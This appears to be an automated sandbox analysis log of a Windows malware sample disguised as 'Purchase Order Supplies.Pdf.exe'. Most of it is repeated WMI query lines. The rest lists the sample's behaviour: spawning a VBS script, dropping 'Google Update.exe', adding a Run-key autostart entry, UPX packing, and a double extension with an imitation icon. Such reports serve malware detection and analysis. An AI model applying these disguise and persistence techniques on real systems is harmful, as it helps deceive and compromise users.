              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe File read: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe
              Source: unknown Process created: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe"
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: napinsp.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: pnrpnsp.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: wshbth.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: nlaapi.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: winrnr.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: sxs.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CF20F6 LoadLibraryA,GetProcAddress,1_2_00CF20F6
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00D205A8 push ss; ret 1_2_00D205A9
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CB7795 push ecx; ret 1_2_00CB77A8
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Code function: 1_2_00CB18F0 push cs; retf 1_2_00CB18F5
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | File created: C:\Users\user\AppData\Roaming\Windata\Google Update.exe (dropped file)
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KKRBIX

              Hooking and other Techniques for Hiding and Protection

              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
              Source: Possible double extension: pdf.exeStatic PE information: Purchase Order Supplies.Pdf.exe
